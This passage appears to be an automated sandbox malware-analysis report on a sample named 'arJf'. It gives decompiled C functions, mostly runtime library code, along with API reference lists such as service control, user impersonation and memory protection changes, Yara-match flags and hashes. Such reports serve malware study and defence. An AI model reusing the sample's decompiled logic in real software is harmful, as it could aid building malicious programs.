                                                                        					if(_t14 != 0) {
                                                                        						break;
                                                                        					}
                                                                        					_t15 = E0040D2E3(_a4);
                                                                        					__eflags = _t15;
                                                                        					if(_t15 == 0) {
                                                                        						__eflags =  *0x423490 & 0x00000001;
                                                                        						if(( *0x423490 & 0x00000001) == 0) {
                                                                        							 *0x423490 =  *0x423490 | 0x00000001;
                                                                        							__eflags =  *0x423490;
                                                                        							E0040AEFC(0x423484);
                                                                        							E0040D2BD( *0x423490, 0x41a704);
                                                                        						}
                                                                        						E0040AF49( &_v16, 0x423484);
                                                                        						E0040CD39( &_v16, 0x420fa4);
                                                                        						asm("int3");
                                                                        						_t47 = _t45;
                                                                        						_push(_t47);
                                                                        						_push(0xc);
                                                                        						_push(0x420ff8);
                                                                        						_t19 = E0040E1D8(_t28, _t40, 0x423484);
                                                                        						_t42 = _v4;
                                                                        						__eflags = _t42;
                                                                        						if(_t42 != 0) {
                                                                        							__eflags =  *0x4250b0 - 3;
                                                                        							if( *0x4250b0 != 3) {
                                                                        								_push(_t42);
                                                                        								goto L16;
                                                                        							} else {
                                                                        								E0040D6E0(_t28, 4);
                                                                        								_v16 = _v16 & 0x00000000;
                                                                        								_t24 = E0040D713(_t42);
                                                                        								_v40 = _t24;
                                                                        								__eflags = _t24;
                                                                        								if(_t24 != 0) {
                                                                        									_push(_t42);
                                                                        									_push(_t24);
                                                                        									E0040D743();
                                                                        								}
                                                                        								_v16 = 0xfffffffe;
                                                                        								_t19 = E0040B70B();
                                                                        								__eflags = _v40;
                                                                        								if(_v40 == 0) {
                                                                        									_push(_v4);
                                                                        									L16:
                                                                        									__eflags = HeapFree( *0x4234b4, 0, ??);
                                                                        									if(__eflags == 0) {
                                                                        										_t21 = E0040BFC1(__eflags);
                                                                        										 *_t21 = E0040BF7F(GetLastError());
                                                                        									}
                                                                        								}
                                                                        							}
                                                                        						}
                                                                        						return E0040E21D(_t19);
                                                                        					} else {
                                                                        						continue;
                                                                        					}
                                                                        					L19:
                                                                        				}
                                                                        				return _t14;
                                                                        				goto L19;
                                                                        			}

















                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0040af7b
                                                                        0x0040af8b
                                                                        0x00000000

                                                                        APIs
                                                                        • _malloc.LIBCMT ref: 0040AF80
                                                                          • Part of subcall function 0040B84D: __FF_MSGBANNER.LIBCMT ref: 0040B870
                                                                          • Part of subcall function 0040B84D: __NMSG_WRITE.LIBCMT ref: 0040B877
                                                                          • Part of subcall function 0040B84D: RtlAllocateHeap.NTDLL(00000000,-0000000E,00000001,00000000,00000000,?,00411C86,00000001,00000001,00000001,?,0040D66A,00000018,00421240,0000000C,0040D6FB), ref: 0040B8C4
                                                                        • std::bad_alloc::bad_alloc.LIBCMT ref: 0040AFA3
                                                                          • Part of subcall function 0040AEFC: std::exception::exception.LIBCMT ref: 0040AF08
                                                                        • std::bad_exception::bad_exception.LIBCMT ref: 0040AFB7
                                                                        • __CxxThrowException@8.LIBCMT ref: 0040AFC5
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.360346336.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.360346336.0000000000426000.00000040.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.360346336.000000000042F000.00000040.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_400000_arJf.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: AllocateException@8HeapThrow_mallocstd::bad_alloc::bad_allocstd::bad_exception::bad_exceptionstd::exception::exception
                                                                        • String ID:
                                                                        • API String ID: 1411284514-0
                                                                        • Opcode ID: a95b220d2d9c14b1a5c56d8a9dfd7e07f088015f43c1402ade5625b42879af68
                                                                        • Instruction ID: 8b9ae61c6da4be1dff3a05d3864a1109474d1d20ea1a05e38be312cad591667e
                                                                        • Opcode Fuzzy Hash: a95b220d2d9c14b1a5c56d8a9dfd7e07f088015f43c1402ade5625b42879af68
                                                                        • Instruction Fuzzy Hash: 67F0BE21A0030662CA15BB61EC06D8E3B688F4031CB6000BFE811761D2CFBCEA55859E
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 175 40e7ee-40e7f6 call 40e7c3 177 40e7fb-40e7ff ExitProcess 175->177
                                                                        C-Code - Quality: 100%
                                                                        			E0040E7EE(int _a4) {
                                                                        
                                                                        				E0040E7C3(_a4); // executed
                                                                        				ExitProcess(_a4);
                                                                        			}



                                                                        0x0040e7f6
                                                                        0x0040e7ff

                                                                        APIs
                                                                        • ___crtCorExitProcess.LIBCMT ref: 0040E7F6
                                                                          • Part of subcall function 0040E7C3: GetModuleHandleW.KERNEL32(mscoree.dll,?,0040E7FB,00000001,?,0040B886,000000FF,0000001E,?,00411C86,00000001,00000001,00000001,?,0040D66A,00000018), ref: 0040E7CD
                                                                          • Part of subcall function 0040E7C3: GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0040E7DD
                                                                          • Part of subcall function 0040E7C3: CorExitProcess.MSCOREE(00000001,?,0040E7FB,00000001,?,0040B886,000000FF,0000001E,?,00411C86,00000001,00000001,00000001,?,0040D66A,00000018), ref: 0040E7EA
                                                                        • ExitProcess.KERNEL32 ref: 0040E7FF
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.360346336.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.360346336.0000000000426000.00000040.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.360346336.000000000042F000.00000040.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_400000_arJf.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ExitProcess$AddressHandleModuleProc___crt
                                                                        • String ID:
                                                                        • API String ID: 2427264223-0
                                                                        • Opcode ID: 65da83064d662722dc3cf0b1a9484b1fe75efcd2066e1800ec5593f74242e35d
                                                                        • Instruction ID: d9ec683f250bcd397ae0bae66fbc2b9097e114182cfe22e5ca4178904d999afd
                                                                        • Opcode Fuzzy Hash: 65da83064d662722dc3cf0b1a9484b1fe75efcd2066e1800ec5593f74242e35d
                                                                        • Instruction Fuzzy Hash: ADB09B31000108BFDB112F13DC09C493F59DB40750711C435F41805071DF719D5195D5
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 286 20299e8-2029a49 288 2029a82-2029ad2 OpenServiceA 286->288 289 2029a4b-2029a55 286->289 296 2029ad4-2029ada 288->296 297 2029adb-2029b0c 288->297 289->288 290 2029a57-2029a59 289->290 291 2029a5b-2029a65 290->291 292 2029a7c-2029a7f 290->292 294 2029a67 291->294 295 2029a69-2029a78 291->295 292->288 294->295 295->295 298 2029a7a 295->298 296->297 301 2029b0e-2029b12 297->301 302 2029b1c 297->302 298->292 301->302 303 2029b14 301->303 303->302
                                                                        APIs
                                                                        • OpenServiceA.ADVAPI32(?,?,?), ref: 02029AC2
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.368396198.0000000002020000.00000040.00000800.00020000.00000000.sdmp, Offset: 02020000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_2020000_arJf.jbxd
                                                                        Similarity
                                                                        • API ID: OpenService
                                                                        • String ID:
                                                                        • API String ID: 3098006287-0
                                                                        • Opcode ID: 6ace41aadfb72a6b6c0feb8a28c8cd6daa2bc251e34da0b69961be0fa68467ee
                                                                        • Instruction ID: 972abe126b2932eb0e22730101433df338e76858e7dde678b0805e1fa59dadaa
                                                                        • Opcode Fuzzy Hash: 6ace41aadfb72a6b6c0feb8a28c8cd6daa2bc251e34da0b69961be0fa68467ee
                                                                        • Instruction Fuzzy Hash: D93155B0D003288FDB11CFA9C985B9EBBF5BB48304F24812AE819AB340D7749849DF91
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 304 2029920-202996f 306 2029971-2029974 304->306 307 2029977-202997b 304->307 306->307 308 2029983-20299b2 OpenSCManagerW 307->308 309 202997d-2029980 307->309 310 20299b4-20299ba 308->310 311 20299bb-20299cf 308->311 309->308 310->311
                                                                        APIs
                                                                        • OpenSCManagerW.SECHOST(00000000,00000000,?), ref: 020299A5
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.368396198.0000000002020000.00000040.00000800.00020000.00000000.sdmp, Offset: 02020000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_2020000_arJf.jbxd
                                                                        Similarity
                                                                        • API ID: ManagerOpen
                                                                        • String ID:
                                                                        • API String ID: 1889721586-0
                                                                        • Opcode ID: 2bf8d37edfcae6f310ed9dbdb8d928e5c3d1d24ee252aa3955bdd7fd6920ff50
                                                                        • Instruction ID: c3b99b88d664b011073e468a17c5c301c17010084357e630b26511197d88a121
                                                                        • Opcode Fuzzy Hash: 2bf8d37edfcae6f310ed9dbdb8d928e5c3d1d24ee252aa3955bdd7fd6920ff50
                                                                        • Instruction Fuzzy Hash: D62104B5D002199FCB50CF99D884ADEFBF4EB88324F14815AD818BB244D7759944CBA5
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 313 2029180-2029201 VirtualProtect 316 2029203-2029209 313->316 317 202920a-202922f 313->317 316->317
                                                                        APIs
                                                                        • VirtualProtect.KERNELBASE(?,?,?,?), ref: 020291F4
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.368396198.0000000002020000.00000040.00000800.00020000.00000000.sdmp, Offset: 02020000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_2020000_arJf.jbxd
                                                                        Similarity
                                                                        • API ID: ProtectVirtual
                                                                        • String ID:
                                                                        • API String ID: 544645111-0
                                                                        • Opcode ID: 9a19ec0786c4988db57b6325ee21dce5a5d253941fc3a208a44b9a0a2b12bbd7
                                                                        • Instruction ID: 2054a308a60e114632b50805e251a65d6f6661c94aeb0f68cb0a44ce10744cf6
                                                                        • Opcode Fuzzy Hash: 9a19ec0786c4988db57b6325ee21dce5a5d253941fc3a208a44b9a0a2b12bbd7
                                                                        • Instruction Fuzzy Hash: D611F2B1D003199BCB10DFAAC884AEFFBF5EF58314F50842AD529A7240C778A945CFA5
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 321 202a0e8-202a165 ControlService 323 202a167-202a16d 321->323 324 202a16e-202a18f 321->324 323->324
                                                                        APIs
                                                                        • ControlService.ADVAPI32(?,?,?), ref: 0202A158
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.368396198.0000000002020000.00000040.00000800.00020000.00000000.sdmp, Offset: 02020000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_2020000_arJf.jbxd
                                                                        Similarity
                                                                        • API ID: ControlService
                                                                        • String ID:
                                                                        • API String ID: 253159669-0
                                                                        • Opcode ID: 52c6ff237f985fa1ec4e3a81e4210308813f6c29dea9a5f65b0b4358a8fce19a
                                                                        • Instruction ID: 1b28e78d4eb918597e614733801ba246fb555693211b0aabce58dad37e74f936
                                                                        • Opcode Fuzzy Hash: 52c6ff237f985fa1ec4e3a81e4210308813f6c29dea9a5f65b0b4358a8fce19a
                                                                        • Instruction Fuzzy Hash: 1911F9B1D006199FDB10CF9AC984BDEFBF4EB48324F10852AD558A7340D378A945CFA5
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 326 2029ed8-2029f44 ImpersonateLoggedOnUser 328 2029f46-2029f4c 326->328 329 2029f4d-2029f6e 326->329 328->329
                                                                        APIs
                                                                        • ImpersonateLoggedOnUser.KERNELBASE ref: 02029F37
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.368396198.0000000002020000.00000040.00000800.00020000.00000000.sdmp, Offset: 02020000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_2020000_arJf.jbxd
                                                                        Similarity
                                                                        • API ID: ImpersonateLoggedUser
                                                                        • String ID:
                                                                        • API String ID: 2216092060-0
                                                                        • Opcode ID: 7b8a23dd64ff5808114c7ef21c00392b6dd9ff48d50df99930581f76f507d6d3
                                                                        • Instruction ID: 9094a254690211ec4156fe51c5474d19d64a1c157e86bd60ad772c6678861e14
                                                                        • Opcode Fuzzy Hash: 7b8a23dd64ff5808114c7ef21c00392b6dd9ff48d50df99930581f76f507d6d3
                                                                        • Instruction Fuzzy Hash: 111136B1900259CFDB10CF9AC944BDEBBF8EB48324F20845AD558A3340C378A945CFA5
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 331 40d534-40d556 HeapCreate 332 40d558-40d559 331->332 333 40d55a-40d563 331->333
                                                                        C-Code - Quality: 100%
                                                                        			E0040D534(intOrPtr _a4) {
                                                                        				void* _t6;
                                                                        
                                                                        				_t6 = HeapCreate(0 | _a4 == 0x00000000, 0x1000, 0); // executed
                                                                        				 *0x4234b4 = _t6;
                                                                        				if(_t6 != 0) {
                                                                        					 *0x4250b0 = 1;
                                                                        					return 1;
                                                                        				} else {
                                                                        					return _t6;
                                                                        				}
                                                                        			}





                                                                        APIs
                                                                        • HeapCreate.KERNELBASE(00000000,00001000,00000000), ref: 0040D549
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.360346336.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.360346336.0000000000426000.00000040.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.360346336.000000000042F000.00000040.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_400000_arJf.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CreateHeap
                                                                        • String ID:
                                                                        • API String ID: 10892065-0
                                                                        • Opcode ID: b92e553731a4154449cde6b8e59536b0b0aa674871376bfeaf174e1f515a675d
                                                                        • Instruction ID: a29dbb507fbbbc11cf477c5ad410ace9233c9b691e3651c0b65acef059567112
                                                                        • Opcode Fuzzy Hash: b92e553731a4154449cde6b8e59536b0b0aa674871376bfeaf174e1f515a675d
                                                                        • Instruction Fuzzy Hash: E8D05E36A54348AADB11AFB47C08B623BDCE388396F404576F80DC6290F678D641C548
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 334 40ea0a-40ea16 call 40e8de 336 40ea1b-40ea1f 334->336
                                                                        C-Code - Quality: 25%
                                                                        			E0040EA0A(intOrPtr _a4) {
                                                                        				void* __ebp;
                                                                        				void* _t2;
                                                                        				void* _t3;
                                                                        				void* _t4;
                                                                        				void* _t5;
                                                                        				void* _t8;
                                                                        
                                                                        				_push(0);
                                                                        				_push(0);
                                                                        				_push(_a4);
                                                                        				_t2 = E0040E8DE(_t3, _t4, _t5, _t8); // executed
                                                                        				return _t2;
                                                                        			}










                                                                        APIs
                                                                        • _doexit.LIBCMT ref: 0040EA16
                                                                          • Part of subcall function 0040E8DE: __lock.LIBCMT ref: 0040E8EC
                                                                          • Part of subcall function 0040E8DE: __decode_pointer.LIBCMT ref: 0040E923
                                                                          • Part of subcall function 0040E8DE: __decode_pointer.LIBCMT ref: 0040E938
                                                                          • Part of subcall function 0040E8DE: __decode_pointer.LIBCMT ref: 0040E962
                                                                          • Part of subcall function 0040E8DE: __decode_pointer.LIBCMT ref: 0040E978
                                                                          • Part of subcall function 0040E8DE: __decode_pointer.LIBCMT ref: 0040E985
                                                                          • Part of subcall function 0040E8DE: __initterm.LIBCMT ref: 0040E9B4
                                                                          • Part of subcall function 0040E8DE: __initterm.LIBCMT ref: 0040E9C4
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.360346336.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.360346336.0000000000426000.00000040.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.360346336.000000000042F000.00000040.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_400000_arJf.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: __decode_pointer$__initterm$__lock_doexit
                                                                        • String ID:
                                                                        • API String ID: 1597249276-0
                                                                        • Opcode ID: 02276376eab60fb44a6de362a8cb41930a671a9c3f5feaa45b9c6d7d217bd1ad
                                                                        • Instruction ID: a0257ab8b89ab24c4dda27abc63ac43d0f25756bab2839dd78a8b277d7454467
                                                                        • Opcode Fuzzy Hash: 02276376eab60fb44a6de362a8cb41930a671a9c3f5feaa45b9c6d7d217bd1ad
                                                                        • Instruction Fuzzy Hash: D2B0923298420833EA202643AC03F063B1987C0B64E244031BA0C2E1E1A9A2A9618189
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.365436489.00000000008ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 008ED000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_8ed000_arJf.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: c3f7dc15a7cf912fb110c4d6788033beab173cfc1dee440342390bc5c8e4784b
                                                                        • Instruction ID: b438b556e73021a75417aa9755850089fed75f962d0db7d4240c839cbb3213d9
                                                                        • Opcode Fuzzy Hash: c3f7dc15a7cf912fb110c4d6788033beab173cfc1dee440342390bc5c8e4784b
                                                                        • Instruction Fuzzy Hash: B401806140D7C09FD7124B26CC84752BFA8EF53224F1984CBD884DF297C2685C49C7B2
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.365436489.00000000008ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 008ED000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_8ed000_arJf.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: d23b59e7c80f0b53317d845506208301ef6bb46dd12b01fef7865af797248614
                                                                        • Instruction ID: dd1b11356de9be8e83448d8ec8e30087bc4273b160e8fd459f6b3393c4ac5987
                                                                        • Opcode Fuzzy Hash: d23b59e7c80f0b53317d845506208301ef6bb46dd12b01fef7865af797248614
                                                                        • Instruction Fuzzy Hash: 8A01A7714047C4AAE7108A17CC84B66BFD8FF52364F1CC159ED559B246C2799C49C6F1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 85%
                                                                        			E0040CE09(intOrPtr __eax, intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, char _a4) {
                                                                        				intOrPtr _v0;
                                                                        				void* _v804;
                                                                        				intOrPtr _v808;
                                                                        				intOrPtr _v812;
                                                                        				intOrPtr _t6;
                                                                        				intOrPtr _t11;
                                                                        				intOrPtr _t12;
                                                                        				intOrPtr _t13;
                                                                        				long _t17;
                                                                        				intOrPtr _t21;
                                                                        				intOrPtr _t22;
                                                                        				intOrPtr _t25;
                                                                        				intOrPtr _t26;
                                                                        				intOrPtr _t27;
                                                                        				intOrPtr* _t31;
                                                                        				void* _t34;
                                                                        
                                                                        				_t27 = __esi;
                                                                        				_t26 = __edi;
                                                                        				_t25 = __edx;
                                                                        				_t22 = __ecx;
                                                                        				_t21 = __ebx;
                                                                        				_t6 = __eax;
                                                                        				_t34 = _t22 -  *0x422234; // 0xda2ab297
                                                                        				if(_t34 == 0) {
                                                                        					asm("repe ret");
                                                                        				}
                                                                        				 *0x423b98 = _t6;
                                                                        				 *0x423b94 = _t22;
                                                                        				 *0x423b90 = _t25;
                                                                        				 *0x423b8c = _t21;
                                                                        				 *0x423b88 = _t27;
                                                                        				 *0x423b84 = _t26;
                                                                        				 *0x423bb0 = ss;
                                                                        				 *0x423ba4 = cs;
                                                                        				 *0x423b80 = ds;
                                                                        				 *0x423b7c = es;
                                                                        				 *0x423b78 = fs;
                                                                        				 *0x423b74 = gs;
                                                                        				asm("pushfd");
                                                                        				_pop( *0x423ba8);
                                                                        				 *0x423b9c =  *_t31;
                                                                        				 *0x423ba0 = _v0;
                                                                        				 *0x423bac =  &_a4;
                                                                        				 *0x423ae8 = 0x10001;
                                                                        				_t11 =  *0x423ba0; // 0x0
                                                                        				 *0x423a9c = _t11;
                                                                        				 *0x423a90 = 0xc0000409;
                                                                        				 *0x423a94 = 1;
                                                                        				_t12 =  *0x422234; // 0xda2ab297
                                                                        				_v812 = _t12;
                                                                        				_t13 =  *0x422238; // 0x25d54d68
                                                                        				_v808 = _t13;
                                                                        				 *0x423ae0 = IsDebuggerPresent();
                                                                        				_push(1);
                                                                        				E004138FC(_t14);
                                                                        				SetUnhandledExceptionFilter(0);
                                                                        				_t17 = UnhandledExceptionFilter(0x41fb80);
                                                                        				if( *0x423ae0 == 0) {
                                                                        					_push(1);
                                                                        					E004138FC(_t17);
                                                                        				}
                                                                        				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
                                                                        			}

                                                                        APIs
                                                                        • IsDebuggerPresent.KERNEL32 ref: 004136F4
                                                                        • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00413709
                                                                        • UnhandledExceptionFilter.KERNEL32(0041FB80), ref: 00413714
                                                                        • GetCurrentProcess.KERNEL32(C0000409), ref: 00413730
                                                                        • TerminateProcess.KERNEL32(00000000), ref: 00413737
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.360346336.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.360346336.0000000000426000.00000040.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.360346336.000000000042F000.00000040.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_400000_arJf.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                        • String ID:
                                                                        • API String ID: 2579439406-0
                                                                        • Opcode ID: 8d1f5aed7c5dfd20079dd4d946f02ab3c4db913f1b194ab0176bc05653236347
                                                                        • Instruction ID: 93bf0ba95bc2a0faef8203f21c221f33afe887fd41373e09ae0fa508b254143b
                                                                        • Opcode Fuzzy Hash: 8d1f5aed7c5dfd20079dd4d946f02ab3c4db913f1b194ab0176bc05653236347
                                                                        • Instruction Fuzzy Hash: A521C3B4601204EFD720DF65E94A6457FB4FB08356F80407AE50887772E7B86682CF4D
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E0040ADB0(intOrPtr* __ecx) {
                                                                        				void* _t5;
                                                                        				intOrPtr* _t11;
                                                                        
                                                                        				_t11 = __ecx;
                                                                        				_t5 =  *(__ecx + 8);
                                                                        				 *__ecx = 0x41eff0;
                                                                        				if(_t5 != 0) {
                                                                        					_t5 =  *((intOrPtr*)( *((intOrPtr*)( *_t5 + 8))))(_t5);
                                                                        				}
                                                                        				if( *(_t11 + 0xc) != 0) {
                                                                        					_t5 = GetProcessHeap();
                                                                        					if(_t5 != 0) {
                                                                        						return HeapFree(_t5, 0,  *(_t11 + 0xc));
                                                                        					}
                                                                        				}
                                                                        				return _t5;
                                                                        			}

                                                                        APIs
                                                                        • GetProcessHeap.KERNEL32 ref: 0040ADD0
                                                                        • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 0040ADE1
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.360346336.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.360346336.0000000000426000.00000040.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.360346336.000000000042F000.00000040.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_400000_arJf.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Heap$FreeProcess
                                                                        • String ID:
                                                                        • API String ID: 3859560861-0
                                                                        • Opcode ID: 97be969a41baf58eb72298c462d2c401217e5b830f10c891868ac5f2a1a85b43
                                                                        • Instruction ID: 72dd180cd7110ee49b406fd12918c6a771032a3efea8c67e715e4993f3fed615
                                                                        • Opcode Fuzzy Hash: 97be969a41baf58eb72298c462d2c401217e5b830f10c891868ac5f2a1a85b43
                                                                        • Instruction Fuzzy Hash: 54E09A312003009FC320AB61DC08FA337AAEF88311F04C829E55A936A0DB78EC42CB58
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 86%
                                                                        			E00417081(short* __ecx, int _a4, signed int _a8, char* _a12, int _a16, char* _a20, int _a24, int _a28, intOrPtr _a32) {
                                                                        				signed int _v8;
                                                                        				int _v12;
                                                                        				int _v16;
                                                                        				int _v20;
                                                                        				intOrPtr _v24;
                                                                        				void* _v36;
                                                                        				void* __ebx;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				void* __ebp;
                                                                        				signed int _t110;
                                                                        				intOrPtr _t112;
                                                                        				intOrPtr _t113;
                                                                        				short* _t115;
                                                                        				short* _t116;
                                                                        				char* _t120;
                                                                        				short* _t121;
                                                                        				short* _t123;
                                                                        				short* _t127;
                                                                        				int _t128;
                                                                        				short* _t141;
                                                                        				signed int _t144;
                                                                        				void* _t146;
                                                                        				short* _t147;
                                                                        				signed int _t150;
                                                                        				short* _t153;
                                                                        				char* _t157;
                                                                        				int _t160;
                                                                        				long _t162;
                                                                        				signed int _t174;
                                                                        				signed int _t178;
                                                                        				signed int _t179;
                                                                        				int _t182;
                                                                        				short* _t184;
                                                                        				signed int _t186;
                                                                        				signed int _t188;
                                                                        				short* _t189;
                                                                        				int _t191;
                                                                        				intOrPtr _t194;
                                                                        				int _t207;
                                                                        
                                                                        				_t110 =  *0x422234; // 0xda2ab297
                                                                        				_v8 = _t110 ^ _t188;
                                                                        				_t184 = __ecx;
                                                                        				_t194 =  *0x423e7c; // 0x1
                                                                        				if(_t194 == 0) {
                                                                        					_t182 = 1;
                                                                        					if(LCMapStringW(0, 0x100, 0x420398, 1, 0, 0) == 0) {
                                                                        						_t162 = GetLastError();
                                                                        						__eflags = _t162 - 0x78;
                                                                        						if(_t162 == 0x78) {
                                                                        							 *0x423e7c = 2;
                                                                        						}
                                                                        					} else {
                                                                        						 *0x423e7c = 1;
                                                                        					}
                                                                        				}
                                                                        				if(_a16 <= 0) {
                                                                        					L13:
                                                                        					_t112 =  *0x423e7c; // 0x1
                                                                        					if(_t112 == 2 || _t112 == 0) {
                                                                        						_v16 = 0;
                                                                        						_v20 = 0;
                                                                        						__eflags = _a4;
                                                                        						if(_a4 == 0) {
                                                                        							_a4 =  *((intOrPtr*)( *_t184 + 0x14));
                                                                        						}
                                                                        						__eflags = _a28;
                                                                        						if(_a28 == 0) {
                                                                        							_a28 =  *((intOrPtr*)( *_t184 + 4));
                                                                        						}
                                                                        						_t113 = E00417A20(0, _t179, _t182, _t184, _a4);
                                                                        						_v24 = _t113;
                                                                        						__eflags = _t113 - 0xffffffff;
                                                                        						if(_t113 != 0xffffffff) {
                                                                        							__eflags = _t113 - _a28;
                                                                        							if(_t113 == _a28) {
                                                                        								_t184 = LCMapStringA(_a4, _a8, _a12, _a16, _a20, _a24);
                                                                        								L78:
                                                                        								__eflags = _v16;
                                                                        								if(__eflags != 0) {
                                                                        									_push(_v16);
                                                                        									E0040B6B5(0, _t182, _t184, __eflags);
                                                                        								}
                                                                        								_t115 = _v20;
                                                                        								__eflags = _t115;
                                                                        								if(_t115 != 0) {
                                                                        									__eflags = _a20 - _t115;
                                                                        									if(__eflags != 0) {
                                                                        										_push(_t115);
                                                                        										E0040B6B5(0, _t182, _t184, __eflags);
                                                                        									}
                                                                        								}
                                                                        								_t116 = _t184;
                                                                        								goto L84;
                                                                        							}
                                                                        							_t120 = E00417A69(_t179, _a28, _t113, _a12,  &_a16, 0, 0);
                                                                        							_t191 =  &(_t189[0xc]);
                                                                        							_v16 = _t120;
                                                                        							__eflags = _t120;
                                                                        							if(_t120 == 0) {
                                                                        								goto L58;
                                                                        							}
                                                                        							_t121 = LCMapStringA(_a4, _a8, _t120, _a16, 0, 0);
                                                                        							_v12 = _t121;
                                                                        							__eflags = _t121;
                                                                        							if(__eflags != 0) {
                                                                        								if(__eflags <= 0) {
                                                                        									L71:
                                                                        									_t182 = 0;
                                                                        									__eflags = 0;
                                                                        									L72:
                                                                        									__eflags = _t182;
                                                                        									if(_t182 == 0) {
                                                                        										goto L62;
                                                                        									}
